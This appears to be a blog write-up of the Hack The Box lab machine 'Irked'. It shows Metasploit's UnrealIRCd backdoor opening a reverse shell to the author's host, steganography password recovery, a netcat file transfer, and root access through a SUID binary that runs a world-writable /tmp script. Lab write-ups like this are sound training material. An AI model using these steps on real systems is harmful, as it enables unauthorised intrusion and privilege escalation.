18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Irked

As always I start with a port scan to get a list of open ports and running services:

# Nmap 7.70 scan initiated Sun Nov 18 20:40:15 2018 as: nmap -v -n -T4 -sS -sV -sC -oN nmap.scan -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.029s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          40080/udp  status
|_  100024  1          47737/tcp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47737/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 18 20:41:48 2018 -- 1 IP address (1 host up) scanned in 92.87 seconds

Some information about the running webserver:

HTTP/1.1 200 OK
Date: Sun, 18 Nov 2018 20:00:42 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Mon, 14 May 2018 18:00:02 GMT
ETag: "48-56c2e413aa86b"
Accept-Ranges: bytes
Content-Length: 72
Vary: Accept-Encoding
Content-Type: text/html

The browser can’t load the website, but cURL gives some information:

root@n0w4n:~/htb/irked# curl -vv 10.10.10.117
* Rebuilt URL to: 10.10.10.117/
*   Trying 10.10.10.117...
* TCP_NODELAY set
* Connected to 10.10.10.117 (10.10.10.117) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.117
> User-Agent: curl/7.61.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 18 Nov 2018 20:02:29 GMT
< Server: Apache/2.4.10 (Debian)
< Last-Modified: Mon, 14 May 2018 18:00:02 GMT
< ETag: "48-56c2e413aa86b"
< Accept-Ranges: bytes
< Content-Length: 72
< Vary: Accept-Encoding
< Content-Type: text/html
<
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
* Connection #0 to host 10.10.10.117 left intact

There is an old backdoor in UnrealIRCd 3.2.8.1 for which Metasploit ships an exploit module:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port (TCP)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
rhost => 10.10.10.117
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 10.10.14.8:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jREAOnEfvR5esDJE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "jREAOnEfvR5esDJE\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.117:37970) at 2018-11-18 21:27:38 +0100
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
python -c 'import pty;pty.spawn("/bin/bash");'
ircd@irked:~/Unreal3.2$

And it works. Now to take a look around.

ircd@irked:/tmp/n0w4n$ uname -a
uname -a
Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux
ircd@irked:/tmp/n0w4n$ cat /etc/*-release
cat /etc/*-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
ircd@irked:~$ less .bash_hi
less .bash_history
WARNING: terminal is not fully functional
.bash_history  (press RETURN)
ls
cat aliases
lskeys
ls keys
ls keys/CVS
cd keys
ls
file CVS
cd CVS
ls
ls Root
cat Root/Root
cd Root
ls
file Root
cat Root
cd /
ls
cd /home
ls
cd djmardov
ls
ls *
Input is not a pipe  (press RETURN)
cd /tmp
ls
clear
clear
ls
cd /
ls
cd /var/www/html
ls
cd /tmp
sudo -i
cd /home/ircd
clear
ls
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit

So I did some enumeration and did not find very much.
After a while I looked back at what I had found and banged my head a few times against the wall for being so blind.
The hint was there for the taking.
The .backup file had some content:

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

The mention of steg made me think it had to do with steganography, but which file? Nothing I found on the system looked like it would work.
But one file did. I missed it and feel so dumb: the picture on the main page!

root@n0w4n:~/htb/irked# steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
root@n0w4n:~/htb/irked# cat pass.txt
Kab6h+m+bbp2J:HG
ircd@irked:/tmp$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:/tmp$ id
id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:~/Documents$ cat user.txt
cat user.txt
4a66a78b12dc0e661a59d3f5c0267a8e

Got user, now for root.

djmardov@irked:/tmp$ nc -lp 9999 > linenum.sh
root@n0w4n:~/htb/irked# nc -w3 10.10.10.117 9999 < linenum.sh

This is a nice enumeration tool to use for a quick scan of the system.
After a long look at the report I noticed a file that normally isn’t there.

[-] SUID files:
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount
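One way to triage a SUID listing like the one above automatically, as an added example that is not part of the original writeup: it parses ls-style lines, flags binaries missing from a package baseline (a hypothetical, assumed set), flags any SUID file that is group- or world-writable, and reports the most recently modified one, which is how /usr/bin/viewuser stands out here. The listing is a constructed subset of the report above, and REFERENCE_YEAR is an assumption for entries that show a time instead of a year.

```python
import re
from datetime import datetime

# Constructed sample: a subset of the SUID listing from the report above.
SUID_LISTING = """\
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
"""

# Hypothetical baseline: SUID paths a clean install of this distro is expected to ship.
BASELINE = {"/usr/sbin/exim4", "/usr/bin/pkexec", "/usr/bin/passwd", "/bin/su"}

# Assumed year for ls entries that show HH:MM instead of a year (recently modified files).
REFERENCE_YEAR = 2018

LINE_RE = re.compile(
    r"^(\S{10})\s+\d+\s+(\S+)\s+(\S+)\s+(\d+)\s+"
    r"(\w{3}\s+\d{1,2})\s+(\d{4}|\d{2}:\d{2})\s+(\S+)$")

def parse_listing(text):
    """Turn `ls -l` style lines into dicts with mode, owner, group, size, mtime, path."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip headers such as "[-] SUID files:" and blank lines
        mode, owner, group, size, month_day, year_or_time, path = m.groups()
        year = int(year_or_time) if year_or_time.isdigit() else REFERENCE_YEAR
        mtime = datetime.strptime(f"{' '.join(month_day.split())} {year}", "%b %d %Y")
        entries.append({"mode": mode, "owner": owner, "group": group,
                        "size": int(size), "mtime": mtime, "path": path})
    return entries

def triage(text, baseline):
    """Return (path, reason) findings: unknown binaries, loose modes, and the newest file."""
    entries = parse_listing(text)
    findings = []
    for e in entries:
        if e["path"] not in baseline:
            findings.append((e["path"], "not in package baseline"))
        # mode string is [type][user rwx][group rwx][other rwx]; a writable SUID file is a giveaway
        if e["mode"][5] == "w" or e["mode"][8] == "w":
            findings.append((e["path"], "writable by group or others"))
    if entries:
        newest = max(entries, key=lambda e: e["mtime"])
        findings.append((newest["path"], "newest mtime, check against install date"))
    return findings
```

Run triage(SUID_LISTING, BASELINE) against the full report and compare the baseline with the package manager's file lists to turn the "file that normally isn't there" observation into a repeatable check.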

Running /usr/bin/viewuser shows the following message:

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-26 00:19 (:0)
djmardov pts/0        2018-11-26 13:55 (10.10.14.8)
djmardov pts/1        2018-11-26 13:47 (10.10.14.8)
sh: 1: /tmp/listusers: not found

It is looking for /tmp/listusers but can't find it, and since /tmp is world-writable, let's help it.

djmardov@irked:~$ ls -lah / | grep root
drwxr-xr-x  21 root root 4.0K May 15  2018 .
drwxr-xr-x  21 root root 4.0K May 15  2018 ..
drwxr-xr-x   2 root root 4.0K May 11  2018 bin
drwxr-xr-x   3 root root 4.0K May 15  2018 boot
drwxr-xr-x  16 root root 3.1K Nov 26 00:19 dev
drwxr-xr-x 135 root root  12K Oct 30 14:51 etc
drwxr-xr-x   4 root root 4.0K May 14  2018 home
lrwxrwxrwx   1 root root   33 May 15  2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   33 May 11  2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae
drwxr-xr-x  18 root root 4.0K May 11  2018 lib
drwx------   2 root root  16K May 11  2018 lost+found
drwxr-xr-x   3 root root 4.0K May 11  2018 media
drwxr-xr-x   2 root root 4.0K May 11  2018 mnt
drwxr-xr-x   2 root root 4.0K May 11  2018 opt
dr-xr-xr-x 121 root root    0 Nov 26 00:18 proc
drwx------   2 root root 4.0K Nov  3 04:25 root
drwxr-xr-x  22 root root  820 Nov 26 00:24 run
drwxr-xr-x   2 root root 4.0K Oct 30 14:51 sbin
drwxr-xr-x   2 root root 4.0K May 11  2018 srv
dr-xr-xr-x  13 root root    0 Nov 26 00:18 sys
drwxrwxrwt  11 root root 4.0K Nov 26 14:24 tmp
drwxr-xr-x  10 root root 4.0K May 11  2018 usr
drwxr-xr-x  13 root root 4.0K May 11  2018 var
lrwxrwxrwx   1 root root   29 May 15  2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   29 May 11  2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae

As can be seen, the /root folder has permission 700.

djmardov@irked:/root$ echo "chmod -R 777 /root" > /tmp/listusers && chmod 777 /tmp/listusers
djmardov@irked:/root$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-26 00:19 (:0)
djmardov pts/0        2018-11-26 13:55 (10.10.14.8)
djmardov pts/1        2018-11-26 13:47 (10.10.14.8)
djmardov@irked:~$ ls -lah / | grep root
drwxr-xr-x  21 root root 4.0K May 15  2018 .
drwxr-xr-x  21 root root 4.0K May 15  2018 ..
drwxr-xr-x   2 root root 4.0K May 11  2018 bin
drwxr-xr-x   3 root root 4.0K May 15  2018 boot
drwxr-xr-x  16 root root 3.1K Nov 26 00:19 dev
drwxr-xr-x 135 root root  12K Oct 30 14:51 etc
drwxr-xr-x   4 root root 4.0K May 14  2018 home
lrwxrwxrwx   1 root root   33 May 15  2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   33 May 11  2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae
drwxr-xr-x  18 root root 4.0K May 11  2018 lib
drwx------   2 root root  16K May 11  2018 lost+found
drwxr-xr-x   3 root root 4.0K May 11  2018 media
drwxr-xr-x   2 root root 4.0K May 11  2018 mnt
drwxr-xr-x   2 root root 4.0K May 11  2018 opt
dr-xr-xr-x 121 root root    0 Nov 26 00:18 proc
drwxrwxrwx   2 root root 4.0K Nov  3 04:25 root
drwxr-xr-x  22 root root  820 Nov 26 00:24 run
drwxr-xr-x   2 root root 4.0K Oct 30 14:51 sbin
drwxr-xr-x   2 root root 4.0K May 11  2018 srv
dr-xr-xr-x  13 root root    0 Nov 26 14:25 sys
drwxrwxrwt  11 root root 4.0K Nov 26 14:24 tmp
drwxr-xr-x  10 root root 4.0K May 11  2018 usr
drwxr-xr-x  13 root root 4.0K May 11  2018 var
lrwxrwxrwx   1 root root   29 May 15  2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   29 May 11  2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae

Looks like the permissions on the /root folder have changed for the better.

djmardov@irked:/root$ ls -lah
total 28K
drwxrwxrwx  2 root root 4.0K Nov  3 04:25 .
drwxr-xr-x 21 root root 4.0K May 15  2018 ..
lrwxrwxrwx  1 root root    9 Nov  3 04:25 .bash_history -> /dev/null
-rwxrwxrwx  1 root root  570 Jan 31  2010 .bashrc
-rwxrwxrwx  1 root root   12 Nov  3 04:43 .nano_history
-rwxrwxrwx  1 root root   17 May 14  2018 pass.txt
-rwxrwxrwx  1 root root  140 Nov 19  2007 .profile
-rwxrwxrwx  1 root root   33 May 15  2018 root.txt
djmardov@irked:/root$ cat root.txt
8d8e9e8be64654b6dccc3bff4522daf3

And there we have it. Can't say I really like this machine and the challenge it presented.
It is more a CTF kind of machine than the regular HTB machines, and for something like OSCP training I wouldn't recommend it.
But it does show that enumeration is key.